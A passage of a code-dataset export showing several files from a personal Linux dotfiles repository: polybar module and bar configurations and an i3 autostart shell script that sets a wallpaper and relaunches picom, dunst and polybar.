"text": "# _ U _____ u\n# U /'\\ u \\| ___'|/\n# \\/ _ \\/ | _|'\n# / ___ \\ | |___\n# /_/ \\_\\ |_____|\n# \\\\ >> << >>\n# (__) (__)(__) (__)\n\n\n# ___ ___ _ _ \n# | \\/ | | | | | \n# | . . | ___ __| |_ _| | ___ ___ \n# | |\\/| |/ _ \\ / _` | | | | |/ _ \\/ __|\n# | | | | (_) | (_| | |_| | | __/\\__ \\\n# \\_| |_/\\___/ \\__,_|\\__,_|_|\\___||___/\n\n\n###############################\n# #\n# -*- ALSA MODULE -*- #\n# #\n###############################\n\n[module/alsa]\ntype = internal/alsa\n\nmaster-soundcard = hw:1\nspeaker-soundcard = hw:1\nheadphone-soundcard = hw:1\n\nmaster-mixer = Master\n\n# Volume bar Config.\nbar-volume-width = 10\nbar-volume-empty = \nbar-volume-fill = \nbar-volume-indicator = \nbar-volume-gradient = true\n\nformat-volume-padding = 2\nformat-volume-background = #fff85a\nformat-volume-foreground = #43433a\nformat-volume-underline = #fffb8f\nformat-volume-overline = #fffb8f\n\n# Available tags:\n# 1. <label-volume> (default).\n# 2. <ramp-volume>.\n# 3. <bar-volume>.\nformat-volume = <ramp-volume> <label-volume>\nlabel-volume = %percentage%%\n\n# Available tags:\n# 1. <label-volume> (default).\n# 2. <ramp-volume>.\n# 3. <bar-volume>.\nformat-muted = <label-muted>\n\nlabel-muted = 婢 \"Muted\"\nlabel-muted-padding = 2\nlabel-muted-foreground = ${color.ac}\nlabel-muted-background = #fff85a\nlabel-volume-underline = #fffb8f\nlabel-volume-overline = #fffb8f\n\n# Only applies if <ramp-volume> is used.\nramp-volume-0 = 奄\nramp-volume-1 = 奔\nramp-volume-2 = 墳\n\n###########################\n# #\n# -*- BATTERY -*- #\n# #\n###########################\n\n[module/battery]\ntype = internal/battery\n\n# This is useful in case the battery never reports 100% charge.\nfull-at = 100\n\n# ls -1 /sys/class/power_supply/.\nbattery = BAT0\nadapter = AC\n\n# Needed as a fallback for systems that don't report events on sysfs/procfs.\npoll-interval = 2\n\n# Available tags:\n# 1. <label-charging> (default).\n# 2. <bar-capacity>.\n# 3. <ramp-capacity>.\n# 4. <animation-charging>.\nformat-charging = <animation-charging> <label-charging>\nformat-charging-padding = 2\nformat-charging-foreground = ${color.ac}\nformat-charging-background = #fff85a\nformat-charging-underline = #fffb8f\nformat-charging-overline = #fffb8f\n\n# Available tokens:\n# 1. %percentage% (default).\n# 2. %time%.\n# 3. %consumption% (shows current charge rate in watts).\nlabel-charging = %percentage%%\n\n# Available tags:\n# 1. <label-discharging> (default).\n# 2. <bar-capacity>.\n# 3. <ramp-capacity>.\n# 4. <animation-discharging>.\nformat-discharging = <ramp-capacity> <label-discharging>\nformat-discharging-padding = 2\nformat-discharging-foreground = ${color.ac}\nformat-discharging-background = #fff85a\nformat-discharging-underline = #fffb8f\nformat-discharging-overline = #fffb8f\n\n# Available tokens:\n# 1. %percentage% (default).\n# 2. %time%.\n# 3. %consumption% (shows current charge rate in watts).\nlabel-discharging = %percentage%%\n\n# Available tokens:\n# 1. %percentage% (default).\nlabel-full = Fully Charged\nlabel-full-padding = 2\nlabel-full-foreground = ${color.ac}\nlabel-full-background = #fff85a\nlabel-full-underline = #fffb8f\nlabel-full-overline = #fffb8f\n\n# Only applies if <ramp-capacity> is used.\nramp-capacity-0 = \nramp-capacity-1 = \nramp-capacity-2 = \nramp-capacity-3 = \nramp-capacity-4 = \nramp-capacity-5 = \nramp-capacity-6 = \nramp-capacity-7 = \nramp-capacity-8 = \nramp-capacity-9 = \nramp-capacity-10 = \n\n# Only applies if <bar-capacity> is used.\n#bar-capacity-width = 10\n\n# Only applies if <animation-charging> is used.\nanimation-charging-0 = \nanimation-charging-1 = \nanimation-charging-2 = \nanimation-charging-3 = \nanimation-charging-4 = \nanimation-charging-5 = \nanimation-charging-6 = \n\n# Framerate in milliseconds.\nanimation-charging-framerate = 750\n\n########################\n# #\n# -*- DATE -*- #\n# #\n########################\n\n[module/date]\ntype = internal/date\n\nformat-padding = 2\nformat-background = #fff85a\nformat-foreground = #000\nformat-underline = #fffb8f\nformat-overline = #fffb8f\n\n# Seconds to sleep between updates.\ninterval = 1.0\n\n# Time format.\ntime = %I:%M %p\ntime-alt = %Y-%m-%d%\n\nformat = <label>\n\n# Available tokens:\n# 1. %date%.\n# 2. %time%.\nlabel = %time%\n\n##############################\n# #\n# -*- FILESYSTEM -*- #\n# #\n##############################\n\n[module/filesystem]\ntype = internal/fs\n\n# Mountpoints to display.\nmount-0 = /\n#mount-1 = /home\n#mount-2 = /var\n\n# Seconds to sleep between updates.\ninterval = 10\n\n# Display fixed precision values.\nfixed-values = true\n\n# Spacing between entries.\n#spacing = 4\n\n# Available tags:\n# 1. <label-mounted> (default).\n# 2. <bar-free>.\n# 3. <bar-used>.\n# 4. <ramp-capacity>.\nformat-mounted = <label-mounted>\nformat-mounted-prefix = \n\n# Available tags:\n# 1. <label-unmounted> (default).\nformat-unmounted = <label-unmounted>\nformat-unmounted-prefix = \n\n# Available tokens:\n# 1. %mountpoint%.\n# 2. %type%.\n# 3. %fsname%.\n# 4. %percentage_free%.\n# 5. %percentage_used%.\n# 6. %total%.\n# 7. %free%.\n# 8. %used%.\nlabel-mounted = \" %free%\"\n\n# Available tokens:\n# 1. %mountpoint%\nlabel-unmounted = %mountpoint%: not mounted\n\n##########################\n# #\n# -*- GITHUB -*- #\n# #\n##########################\n\n#[module/github]\n#type = internal/github\n\n# Accessing an access token stored in file.\n#token = ${file:/path/to/file/containing/github/access.token}\n\n# Accessing an access token stored in an environment variable.\n#token = ${env:GITHUB_ACCESS_TOKEN}\n\n# Whether empty notifications should be displayed or not.\n#empty-notifications = false\n\n# Number of seconds in between requests.\n#interval = 10\n\n# Available tags:\n# 1. <label> (default).\n#format = <label>\n\n# Available tokens:\n# 1. %notifications% (default).\n#label = %notifications%\n\n######################\n# #\n# -*- i3 -*- #\n# #\n######################\n\n[module/i3]\ntype = internal/i3\n\n#############\n# SEPARATOR #\n#############\n\npin-workspaces = false\n\n# Separator in between workspaces.\nlabel-separator = \n\n############\n# HANDLERS #\n############\n\n# Create click handler used to focus workspace.\nenable-click = true\n\n# Create scroll handlers used to cycle workspaces.\nenable-scroll = false\n\n###################\n# WORKSPACE ICONS #\n###################\n\n# ws-icon-[0-9]+ = <label>;<icon>.\nws-icon-0 = 1;\nws-icon-1 = 2;\nws-icon-2 = 3;\nws-icon-3 = 4;♝\nws-icon-4 = 5;♞\nws-icon-5 = 6;♞\nws-icon-6 = 7;♞\nws-icon-7 = 8;♞\nws-icon-8 = 9;♞\nws-icon-default = ♟\n\n##########\n# FORMAT #\n##########\n\n# Available tags:\n# 1. <label-state> (default) - gets replaced with <label-(focused|unfocused|visible|urgent)>\n# 2. <label-mode> (default)\nformat = <label-state> <label-mode>\n\nlabel-mode = %mode%\nlabel-mode-background = #e60053\n\n###########\n# FOCUSED #\n###########\n\n# Available tokens:\n# 1. %name%\n# 2. %icon%\n# 3. %index%\n# 4. %output%\nlabel-focused = %icon%\nlabel-focused-padding-left = 0\nlabel-focused-padding-right = 1\nlabel-focused-margin = 1\nlabel-focused-font = 2\nlabel-focused-foreground = #fff\nlabel-focused-background = #2fbbf2\nlabel-focused-overline = #148ebe\nlabel-focused-underline = #148ebe\n\n#############\n# UNFOCUSED #\n#############\n\n# Available tokens:\n# 1. %name%\n# 2. %icon%\n# 3. %index%\n# 4. %output%\nlabel-unfocused = \" %icon% \"\nlabel-unfocused-padding-left = 1\nlabel-unfocused-padding-right = 1\nlabel-unfocused-margin = 1\nlabel-unfocused-font = 2\nlabel-unfocused-background = #eeeeee\nlabel-unfocused-foreground = #dd222222\nlabel-unfocused-overline = #c5c5c5\nlabel-unfocused-underline = #c5c5c5\n\n###########\n# VISIBLE #\n###########\n\n# Available tokens:\n# 1. %name%\n# 2. %icon%\n# 3. %index%\n# 4. %output%\nlabel-visible = \" %icon% \"\nlabel-visible-padding-left = 1\nlabel-visible-padding-right = 1\nlabel-visible-margin = 1\nlabel-visible-font = 2\n\n##########\n# URGENT #\n##########\n\n# Available tokens:\n# 1. %name%\n# 2. %icon%\n# 3. %index%\n# 4. %output%\nlabel-urgent = \" %icon% \"\nlabel-urgent-padding-left = 1\nlabel-urgent-padding-right = 1\nlabel-urgent-margin = 1\nlabel-urgent-font = 2\n\n##########################\n# #\n# -*- MEMORY -*- #\n# #\n##########################\n\n[module/memory]\ntype = internal/memory\n\n# Seconds to sleep between updates\ninterval = 3\n\n# Available tags:\n# 1. <label> (default).\n# 2. <bar-used>.\n# 3. <bar-free>.\n# 4. <ramp-used>.\n# 5. <ramp-free>.\n# 6. <bar-swap-used>.\n# 7. <bar-swap-free>.\n# 8. <ramp-swap-used>.\n# 9. <ramp-swap-free>.\nformat = <label>\nformat-prefix = \n\n# Available tokens:\n# %percentage_used% (default).\n# %percentage_free%.\n# %gb_used%.\n# %gb_free%.\n# %gb_total%.\n# %mb_used%.\n# %mb_free%.\n# %mb_total%.\n# %percentage_swap_used%.\n# %percentage_swap_free%.\n# %mb_swap_total%.\n# %mb_swap_free%.\n# %mb_swap_used%.\n# %gb_swap_total%.\n# %gb_swap_free%.\n# %gb_swap_used%.\nlabel = \" %mb_used%\"\n\n# Only applies if <bar-used> is used.\n#bar-used-indicator =\n#bar-used-width = 50\n#bar-used-foreground-0 = #55aa55\n#bar-used-foreground-1 = #557755\n#bar-used-foreground-2 = #f5a70a\n#bar-used-foreground-3 = #ff5555\n#bar-used-fill = ▐\n#bar-used-empty = ▐\n#bar-used-empty-foreground = #444444\n\n# Only applies if <ramp-used> is used.\n#ramp-used-0 = \n#ramp-used-1 = \n#ramp-used-2 = \n#ramp-used-3 = \n#ramp-used-4 = \n\n# Only applies if <ramp-free> is used.\n#ramp-free-0 = \n#ramp-free-1 = \n#ramp-free-2 = \n#ramp-free-3 = \n#ramp-free-4 = \n\n#######################\n# #\n# -*- MPD -*- #\n# #\n#######################\n\n[module/mpd]\ntype = internal/mpd\n\n# Host where mpd is running (either ip or domain name).\n# Can also be the full path to a unix socket where mpd is running.\n#host = 127.0.0.1\n#port = 6600\n#password = mysecretpassword\n\n# Seconds to sleep between progressbar/song timer sync.\ninterval = 2\n\n# Available tags:\n# 1. <label-song> (default).\n# 2. <label-time>.\n# 3. <bar-progress>.\n# 4. <toggle> - gets replaced with <icon-(pause|play)>.\n# 5. <toggle-stop> - gets replaced with <icon-(stop|play)>.\n# 6. <icon-random>.\n# 7. <icon-repeat>.\n# 8. <icon-repeatone> (deprecated).\n# 9. <icon-single> - Toggle playing only a single song. Replaces <icon-repeatone>.\n# 10. <icon-consume>.\n# 11. <icon-prev>.\n# 12. <icon-stop>.\n# 13. <icon-play>.\n# 14. <icon-pause>.\n# 15. <icon-next>.\n# 16. <icon-seekb>.\n# 17. <icon-seekf>.\nformat-online = <label-song> <icon-prev> <toggle> <icon-next>\n\n#format-playing = ${self.format-online}\n#format-paused = ${self.format-online}\n#format-stopped = ${self.format-online}\n\n# Available tags:\n# 1. <label-offline>.\n#format-offline = <label-offline>\n\n# Available tokens:\n# 1. %artist%.\n# 2. %album-artist%.\n# 3. %album%.\n# 4. %date%.\n# 5. %title%.\nlabel-song = \"%artist% - %title%\"\nlabel-song-maxlen = 25\nlabel-song-ellipsis = true\n\nlabel-offline = \"MPD is offline\"\n\n# Only applies if <icon-X> is used.\nicon-play = \nicon-pause = \nicon-stop = \nicon-prev = \nicon-next = \nicon-seekb = ⏪\nicon-seekf = ⏩\nicon-random = 🔀\nicon-repeat = 🔁\nicon-repeatone = 🔂\nicon-single = 🔂\nicon-consume = ✀\n\n# Used to display the state of random/repeat/repeatone/single.\n# Only applies if <icon-[random|repeat|repeatone|single]> is used.\n#toggle-on-foreground = #ff\n#toggle-off-foreground = #55\n\n# Only applies if <bar-progress> is used.\n#bar-progress-width = 45\n#bar-progress-indicator = |\n#bar-progress-fill = ─\n#bar-progress-empty = ─\n\n#################################\n# #\n# -*- WIRED NETWORK -*- #\n# #\n#################################\n\n[module/wired-network]\ntype = internal/network\ninterface = eth0\n\n[module/wireless-network]\ntype = internal/network\ninterface = wlp3s0\n\n# Normal Module\n[module/network]\ntype = internal/network\ninterface = wlp3s0\n\n# Seconds to sleep between updates.\ninterval = 1.0\n\n# Accumulate values from all interfaces when querying for up/downspeed rate.\naccumulate-stats = true\n\n# Consider an `UNKNOWN` interface state as up.\n# Some devices have an unknown state, even when they're running.\nunknown-as-up = true\n\n# Available tags:\n# 1. <label-connected> (default).\n# 2. <ramp-signal>.\nformat-connected = <ramp-signal> <label-connected>\n\n# Available tags:\n# 1. <label-disconnected> (default).\nformat-disconnected = <label-disconnected>\n\n# Available tags:\n# 1. <label-connected> (default).\n# 2. <label-packetloss>.\n# 3. <animation-packetloss>.\n#format-packetloss = <animation-packetloss> <label-connected>\n\n# Available tokens:\n# 1. %ifname% [wireless+wired].\n# 2. %local_ip% [wireless+wired].\n# 3. %local_ip6% [wireless+wired].\n# 4. %essid% [wireless].\n# 5. %signal% [wireless].\n# 6. %upspeed% [wireless+wired].\n# 7. %downspeed% [wireless+wired].\n# 8. %linkspeed% [wired].\nlabel-connected = \"%essid% %downspeed:8% %upspeed:8%\"\n#label-connected-foreground = #eefafafa\n\n# Available tokens:\n# 1. %ifname% [wireless+wired].\nlabel-disconnected = \"Not Connected\"\n#label-disconnected-foreground = #66ffffff\n\n# Available tokens:\n# 1. %ifname% [wireless+wired].\n# 2. %local_ip% [wireless+wired].\n# 3. %local_ip6% [wireless+wired].\n# 4. %essid% [wireless].\n# 5. %signal% [wireless].\n# 6. %upspeed% [wireless+wired].\n# 7. %downspeed% [wireless+wired].\n# 8. %linkspeed% [wired].\n#label-packetloss = %essid%\n#label-packetloss-foreground = #eefafafa\n\n# Only applies if <ramp-signal> is used.\nramp-signal-0 = \nramp-signal-1 = \nramp-signal-2 = \nramp-signal-3 = \nramp-signal-4 = \n\n# Only applies if <animation-packetloss> is used.\n#animation-packetloss-0 = ⚠\n#animation-packetloss-0-foreground = #ffa64c\n#animation-packetloss-1 = ⚠\n#animation-packetloss-1-foreground = #000000\n\n# Framerate in milliseconds.\n#animation-packetloss-framerate = 500\n\n###############################\n# #\n# -*- TEMPERATURE -*- #\n# #\n###############################\n\n[module/temperature]\ntype = internal/temperature\n\n# Seconds to sleep between updates.\ninterval = 0.5\n\n# Thermal zone to use.\nthermal-zone = 0\n\n# Threshold temperature to display warning label (in degrees celsius).\nwarn-temperature = 60\n\n# Whether or not to show units next to the temperature tokens (°C, °F).\nunits = true\n\n# Available tags:\n# 1. <label> (default).\n# 2. <ramp>.\nformat = <ramp> <label>\n\n# Available tags:\n# 1. <label-warn> (default).\n# 2. <ramp>.\nformat-warn = <ramp> <label-warn>\n\n# Available tokens:\n# %temperature% (deprecated)\n# %temperature-c% (default, temperature in °C)\n# %temperature-f% (temperature in °F)\nlabel = %temperature-c%\n\n# Available tokens:\n# 1. %temperature% (deprecated).\n# 2. %temperature-c% (default, temperature in °C).\n# 3. %temperature-f% (temperature in °F).\nlabel-warn = \"%temperature-c%\"\nlabel-warn-foreground = #f00\n\n# Icons.\nramp-0 = A\nramp-1 = B\n\n############################\n# #\n# -*- KEYBOARD -*- #\n# #\n############################\n\n[module/keyboard]\ntype = internal/xkeyboard\n\n# List of indicators to ignore.\nblacklist-0 = num lock\nblacklist-1 = scroll lock\n\n# Available tags:\n# 1. <label-layout> (default).\n# 2. <label-indicator> (default).\nformat = <label-layout> <label-indicator>\n#format-spacing = 0\n\n# Available tokens:\n# 1. %layout%.\n# 2. %name%.\n# 3. %number%.\nlabel-layout = %layout%\n#label-layout-padding = 2\n#label-layout-background = #bc99ed\n#label-layout-foreground = #000\n\n# Available tokens:\n# 1. %name%.\nlabel-indicator = %name%\n#label-indicator-padding = 2\nlabel-indicator-foreground = ${color.ac}\n\n#########################\n# #\n# -*- TITLE -*- #\n# #\n#########################\n\n[module/title]\ntype = internal/xwindow\n\n# Available tags:\n# 1. <label> (default).\nformat = <label>\n#format-background = ${color.bg}\n#format-foreground = ${color.ac}\n#format-padding = 4\n\n# Available tokens:\n# 1. %title%.\nlabel = %title%\nlabel-maxlen = 30\n\n#label-empty = Arch Linux\n#label-empty-foreground = #707880"
},
{
"alpha_fraction": 0.5761815905570984,
"alphanum_fraction": 0.5991915464401245,
"avg_line_length": 21.731449127197266,
"blob_id": "81ce8f9c367817d09ab16966189f3946d5490dff",
"content_id": "1a647275bd54325e412a83c361fc9c78d5233d31",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "INI",
"length_bytes": 6494,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 283,
"path": "/my-polybar/bars.ini",
"repo_name": "angelip2303/config",
"src_encoding": "UTF-8",
"text": "# _ U _____ u\n# U /'\\ u \\| ___'|/\n# \\/ _ \\/ | _|'\n# / ___ \\ | |___\n# /_/ \\_\\ |_____|\n# \\\\ >> << >>\n# (__) (__)(__) (__)\n\n\n# ______ \n# | ___ \\ \n# | |_/ / __ _ _ __ ___ \n# | ___ \\/ _` | '__/ __|\n# | |_/ / (_| | | \\__ \\\n# \\____/ \\__,_|_| |___/\n\n\n###########################\n# #\n# -*- CPU BAR -*- #\n# #\n###########################\n\n[module/cpu_bar]\ntype = internal/cpu\ninterval = 0.5\n\nformat = <label> <ramp-coreload>\nformat-background = #66cc99\nformat-foreground = #2a5c45\nformat-underline = #60eaa5\nformat-overline = #60eaa5\nformat-padding = 2\n\nlabel = cpu\nlabel-font = 1\n\nramp-coreload-0 = ▁\nramp-coreload-0-font = 4\nramp-coreload-0-foreground = #aaff77\nramp-coreload-1 = ▂\nramp-coreload-1-font = 4\nramp-coreload-1-foreground = #aaff77\nramp-coreload-2 = ▃\nramp-coreload-2-font = 4\nramp-coreload-2-foreground = #aaff77\nramp-coreload-3 = ▄\nramp-coreload-3-font = 4\nramp-coreload-3-foreground = #aaff77\nramp-coreload-4 = ▅\nramp-coreload-4-font = 4\nramp-coreload-4-foreground = #fba922\nramp-coreload-5 = ▆\nramp-coreload-5-font = 4\nramp-coreload-5-foreground = #fba922\nramp-coreload-6 = ▇\nramp-coreload-6-font = 4\nramp-coreload-6-foreground = #ff5555\nramp-coreload-7 = █\nramp-coreload-7-font = 4\nramp-coreload-7-foreground = #ff5555\n\n##################################\n# #\n# -*- FILESYSTEM BAR -*- #\n# #\n##################################\n\n[module/filesystem_bar]\ntype = internal/fs\n\n# Mountpoints to display\nmount-0 = /\n##mount-1 = /home\n##mount-2 = /var\n\n# Seconds to sleep between updates\n# Default: 30\ninterval = 10\n\n# Display fixed precision values\n# Default: false\nfixed-values = false\n\n# Spacing between entries\n# Default: 2\n##spacing = 4\n\n# Available tags:\n# <label-mounted> (default)\n# <bar-free>\n# <bar-used>\n# <ramp-capacity>\nformat-mounted = <bar-used> <label-mounted>\nformat-mounted-prefix = \" \"\n\n# Available tags:\n# <label-unmounted> (default)\n##format-unmounted = <label-unmounted>\n##format-unmounted-prefix = \n\n# Available tokens:\n# %mountpoint%\n# %type%\n# %fsname%\n# %percentage_free%\n# %percentage_used%\n# %total%\n# %free%\n# %used%\n# Default: %mountpoint% %percentage_free%%\nlabel-mounted = %used%/%total%\n\n# Available tokens:\n# %mountpoint%\n# Default: %mountpoint% is not mounted\n##label-unmounted = %mountpoint%: not mounted\n\n# Only applies if <bar-used> is used\nbar-used-width = 10\nbar-used-gradient = false\n\nbar-used-indicator = \nbar-used-indicator-foreground = ${color.bi}\nbar-used-indicator-font = 2\n\nbar-used-fill = ━\nbar-used-foreground-0 = ${color.bn}\nbar-used-foreground-1 = ${color.bn}\nbar-used-foreground-2 = ${color.bn}\nbar-used-foreground-3 = ${color.bn}\nbar-used-foreground-4 = ${color.bn}\nbar-used-foreground-5 = ${color.bm}\nbar-used-foreground-6 = ${color.bm}\nbar-used-foreground-7 = ${color.bd}\nbar-used-foreground-8 = ${color.bd}\nbar-used-fill-font = 2\n\nbar-used-empty = ┉\nbar-used-empty-foreground = ${color.be}\nbar-used-empty-font = 2\n\n##############################\n# #\n# -*- MEMORY BAR -*- #\n# #\n##############################\n\n[module/memory_bar]\ntype = internal/memory\n\n#format = <label> <bar-used>\nformat = <label>\nformat-padding = 2\nformat-background = #cb66cc\nformat-foreground = #ffe3ff\nformat-underline = #e58de6\nformat-overline = #e58de6\n\nlabel = RAM %mb_used% / %mb_total%\nlabel-font = 1\n\nbar-used-width = 15\nbar-used-indicator = |\nbar-used-indicator-font = 4\nbar-used-indicator-foreground = #ffaaf5\nbar-used-fill = ─\nbar-used-fill-font = 4\nbar-used-fill-foreground = #ffaaf5\nbar-used-empty = ─\nbar-used-empty-font = 4\nbar-used-empty-foreground = #934e94\n\n###########################\n# #\n# -*- MPD BAR -*- #\n# #\n###########################\n\n[module/mpd_bar]\ntype = internal/mpd\n\n# Host where mpd is running (either ip or domain name)\n# Can also be the full path to a unix socket where mpd is running.\n##host = 127.0.0.1\n##port = 6600\n##password = mysecretpassword\n\n# Seconds to sleep between progressbar/song timer sync\n# Default: 1\ninterval = 1\n\n# Available tags:\n# <label-song> (default)\n# <label-time>\n# <bar-progress>\n# <toggle> - gets replaced with <icon-(pause|play)>\n# <toggle-stop> - gets replaced with <icon-(stop|play)>\n# <icon-random>\n# <icon-repeat>\n# <icon-repeatone> (deprecated)\n# <icon-single> - Toggle playing only a single song. Replaces <icon-repeatone>\n# <icon-consume>\n# <icon-prev>\n# <icon-stop>\n# <icon-play>\n# <icon-pause>\n# <icon-next>\n# <icon-seekb>\n# <icon-seekf>\nformat-online = <label-song> <bar-progress> <label-time> \n\n#format-playing = ${self.format-online}\n#format-paused = ${self.format-online}\n#format-stopped = ${self.format-online}\n\n# Available tags:\n# <label-offline>\n#format-offline = <label-offline>\n\n# Available tokens:\n# %artist%\n# %album-artist%\n# %album%\n# %date%\n# %title%\n# Default: %artist% - %title%\nlabel-song = \"%title%\"\nlabel-song-maxlen = 25\nlabel-song-ellipsis = true\n\n# Available tokens:\n# %elapsed%\n# %total%\n# Default: %elapsed% / %total%\n##abel-time = %elapsed% / %total%\n\n# Available tokens:\n# None\nlabel-offline = \"mpd is offline\"\n\n# Only applies if <icon-X> is used\nicon-play = \nicon-pause = \nicon-stop = \nicon-prev = \nicon-next = \nicon-seekb = ⏪\nicon-seekf = ⏩\nicon-random = 🔀\nicon-repeat = 🔁\nicon-repeatone = 🔂\nicon-single = 🔂\nicon-consume = ✀\n\n# Used to display the state of random/repeat/repeatone/single\n# Only applies if <icon-[random|repeat|repeatone|single]> is used\n##toggle-on-foreground = #ff\n##toggle-off-foreground = #55\n\n# Only applies if <bar-progress> is used\nbar-progress-width = 10\nbar-progress-gradient = true\n\nbar-progress-indicator = \nbar-progress-indicator-foreground = ${color.bi}\nbar-progress-indicator-font = 2\n\nbar-progress-fill = ━\nbar-progress-foreground-0 = ${color.bn}\nbar-progress-foreground-1 = ${color.bn}\nbar-progress-foreground-2 = ${color.bn}\nbar-progress-foreground-3 = ${color.bm}\nbar-progress-foreground-4 = ${color.bm}\nbar-progress-foreground-5 = ${color.bm}\nbar-progress-foreground-6 = ${color.bd}\nbar-progress-foreground-7 = ${color.bd}\nbar-progress-foreground-8 = ${color.bd}\nbar-progress-fill-font = 2\n\nbar-progress-empty = ┉\nbar-progress-empty-foreground = ${color.be}\nbar-progress-empty-font = 2"
},
{
"alpha_fraction": 0.38085541129112244,
"alphanum_fraction": 0.38543787598609924,
"avg_line_length": 26.29166603088379,
"blob_id": "a2481c040793c6e01129cd2a69ae7e71364623c6",
"content_id": "19f49788230a049423d055ecb0a03c4f0c27ce74",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1964,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 72,
"path": "/i3/autostart.sh",
"repo_name": "angelip2303/config",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\n\n# _ U _____ u\n# U /'\\ u \\| ___'|/\n# \\/ _ \\/ | _|'\n# / ___ \\ | |___\n# /_/ \\_\\ |_____|\n# \\\\ >> << >>\n# (__) (__)(__) (__)\n\n\n# ___ _ _ _ \n# / _ \\ | | | | | | \n# / /_\\ \\_ _| |_ ___ ___| |_ __ _ _ __| |_ \n# | _ | | | | __/ _ \\/ __| __/ _` | '__| __|\n# | | | | |_| | || (_) \\__ \\ || (_| | | | |_ \n# \\_| |_/\\__,_|\\__\\___/|___/\\__\\__,_|_| \\__| \n\n\n##############################\n# #\n# -*- WALLPAPERS -*- #\n# #\n##############################\n\n# feh --bg-scale ~/.config/qtile/wallpapers/wallpaper1.jpg &\nfeh --bg-scale ~/.config/qtile/wallpapers/wallpaper2.png &\n# feh --bg-scale ~/.config/qtile/wallpapers/wallpaper3.png &\n# feh --bg-scale ~/.config/qtile/wallpapers/wallpaper4.jpg &\n# feh --bg-scale ~/.config/qtile/wallpapers/wallpaper5.jpg &\n# feh --bg-scale ~/.config/qtile/wallpapers/wallpaper6.jpg &\n\n###########################\n# #\n# -*- STARTUP -*- #\n# #\n###########################\n\n #########\n # PICOM #\n #########\n\n # If picom is running, kill it to prevent multiple instances.\n if ps -A | grep picom; then\n killall -q picom\n fi\n\n # Load picom\n exec picom --experimental-backends --config ~/.config/picom/picom.conf &\n \n #########\n # DUNST #\n #########\n\n # If dunst is running, kill it to prevent multiple instances.\n if ps -A | grep dunst; then\n killall -q dunst\n fi\n dunst -config ~/.config/dunst/dunstrc/dunstrc &\n\n ###########\n # POLYBAR #\n ###########\n\n # Terminate already running bar instances\n killall -q polybar\n\n # Wait until the processes have been shut down\n while pgrep -u $UID -x polybar >/dev/null; do sleep 1; done\n\n # Launch bar1 and bar2\n polybar -c ~/.config/polybar/my-polybar/config.ini main"
},
{
"alpha_fraction": 0.3288276493549347,
"alphanum_fraction": 0.3478034734725952,
"avg_line_length": 27.294116973876953,
"blob_id": "aba523abdf420306fdc6615edd3509a08bbdb2de",
"content_id": "7431cb342c0d5c3c0ea66b632f382e168e09325f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "INI",
"length_bytes": 3847,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 136,
"path": "/my-polybar/config.ini",
"repo_name": "angelip2303/config",
"src_encoding": "UTF-8",
"text": "# _ U _____ u\n# U /'\\ u \\| ___'|/\n# \\/ _ \\/ | _|'\n# / ___ \\ | |___\n# /_/ \\_\\ |_____|\n# \\\\ >> << >>\n# (__) (__)(__) (__)\n\n\n# _ _ \n# | | | | \n# _ __ ___ | |_ _| |__ __ _ _ __ \n# | '_ \\ / _ \\| | | | | '_ \\ / _` | '__|\n# | |_) | (_) | | |_| | |_) | (_| | | \n# | .__/ \\___/|_|\\__, |_.__/ \\__,_|_| \n# | | __/ | \n# |_| |___/ \n\n\n# Dependencies#\n\n# 1. Network MODULE --> networkmanager-dmenu and dmenu.\n#\n#\n\n###################################\n# #\n# -*- INCLUDING FILES -*- #\n# #\n###################################\n\ninclude-file = ~/.config/polybar/my-polybar/colors.ini\ninclude-file = ~/.config/polybar/my-polybar/modules.ini\ninclude-file = ~/.config/polybar/my-polybar/user_modules.ini\ninclude-file = ~/.config/polybar/my-polybar/bars.ini\n\n################################\n# #\n# -*- BAR SETTINGS -*- #\n# #\n################################\n\n[bar/main]\n\n########################################\n# SETTINGS FOR THE BAR TO WORK WITH I3 #\n########################################\n\noverride-redirect = true\n\n####################\n# GENERAL SETTINGS #\n####################\n\nlocale = en_US.UTF-8\n\nfont-0 = \"Anonymice Nerd Font:size=10;2\"\nfont-1 = \"Anonymice Nerd Font:size=13;3\"\nfont-2 = \"icomoon\\-feather:size=10;2\"\nfont-3 = \"unifont:size=6;2\"\n\n########################\n# SIZE AND POSITIONING #\n########################\n\n# Put the bar at the bottom of the screen.\nbottom = false\n\nwidth = 98%\nheight = 24\n\noffset-x = 1%\noffset-y = 2%:-3\n\n##########\n# COLORS #\n##########\n\nbackground = ${color.bg}\nforeground = ${color.fg}\n\n###########\n# BORDERS #\n###########\n\n# Line selecting the active workspace.\n# 1. {overline,underline}-size.\n# 2. {overline,underline}-color.\noverline-size = 2\noverline-color = #bc92f8\nunderline-size = 2\nunderline-color = #bc92f8\n\n# Borders surrounding the bar.\n# 1. border-{left,top,right,bottom}-size\n# 2. border-{left,top,right,bottom}-color\nborder-left-size= 0\nborder-right-size= 0\nborder-color = ${color.ac}\n\npadding = 0\n\n# Number of spaces to add before/after each module.\nmodule-margin-left = 1\nmodule-margin-right = 1\n\n###########\n# MODULES #\n###########\n\n#########################################################################\n# -*- MODULES -*- | -*- USER-MODULES -*- | -*- BARS -*- #\n#-----------------------------------------------------------------------#\n# 1. alsa. | 1. checknetwork. | 1. cpu_bar. #\n# 2. battery. | 2. updates. | 2. memory_bar. #\n# 3. date. | 3. window_switch. | 3. filesystem_bar. #\n# 4. filesystem. | 4. launcher | 4. mpd_bar. #\n# 5. github. | 5. powermenu. | #\n# 6. i3. | 6. sysmenu. | #\n# 7. memory. | 7. menu. | #\n# 8. mpd. | | #\n# 9. wired-network. | | #\n# 10. network. | | #\n# 11. temperature. | | #\n# 12. keyboard. | | #\n# 13. title. | | #\n#########################################################################\n\nmodules-left = launcher i3\nmodules-center = \nmodules-right = updates cpu_bar memory_bar alsa battery checknetwork date sysmenu\n\nseparator =\n\n# This value is used to add extra spacing between elements.\nspacing = 0"
},
{
"alpha_fraction": 0.5373888611793518,
"alphanum_fraction": 0.550113320350647,
"avg_line_length": 24.0567684173584,
"blob_id": "73fad9e96607c38f3e00efde293cfa28602293c1",
"content_id": "0283906ad6cd15c40863c65cb97eb1ee942ca40d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "INI",
